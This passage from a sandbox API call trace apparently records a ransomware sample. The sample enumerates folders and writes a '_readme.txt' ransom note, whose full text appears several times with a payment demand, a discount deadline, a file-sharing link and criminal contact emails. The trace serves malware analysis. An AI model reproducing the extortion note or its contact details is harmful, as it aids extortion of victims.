lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.566] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0209.566] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.566] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.566] PathFindFileNameW (pszPath="") returned="" [0209.566] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.566] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.566] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.566] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.567] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.567] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9cb0 [0209.567] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864e0 [0209.567] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.567] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286490 [0209.567] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286468 | out: hHeap=0x750000) returned 1 [0209.567] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.567] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32864e0 | out: hHeap=0x750000) returned 1 [0209.567] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.567] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286490 | out: hHeap=0x750000) returned 1 [0209.567] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286490 [0209.567] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x81c) returned 0x32d9cb0 [0209.567] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0209.567] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.567] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286490 | out: hHeap=0x750000) returned 1 [0209.567] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0209.568] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a86060 [0209.568] lstrcpyW (in: lpString1=0x3a86060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.568] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.568] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.568] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.568] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.568] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a86060 | out: hHeap=0x750000) returned 1 [0209.568] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.568] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286490 [0209.569] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0xffffffff [0209.569] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286490 | out: hHeap=0x750000) returned 1 [0209.569] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.569] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.569] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.569] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253540 [0209.569] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.569] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.569] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.569] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.569] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534b0 | out: hHeap=0x750000) returned 1 [0209.569] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.569] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.569] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.569] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534b0 | out: hHeap=0x750000) returned 1 [0209.569] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.569] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.569] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.569] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534b0 | out: hHeap=0x750000) returned 1 [0209.569] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.569] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534b0 | out: hHeap=0x750000) returned 1 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534b0 | out: hHeap=0x750000) returned 1 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534b0 | out: hHeap=0x750000) returned 1 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253540 | out: hHeap=0x750000) returned 1 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.570] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.570] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.570] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.571] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.571] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.572] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.572] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.573] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.573] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.573] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.573] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.573] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.573] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.573] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.573] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.573] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.573] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.573] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.573] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.573] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.573] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.573] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.573] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.573] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.574] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.574] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.574] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.574] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.574] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.574] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.574] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.574] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.574] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.574] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.574] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.574] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.574] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.574] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.574] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.574] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.574] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.574] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.574] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.576] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.576] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.576] HeapFree (in: hHeap=0x750000, 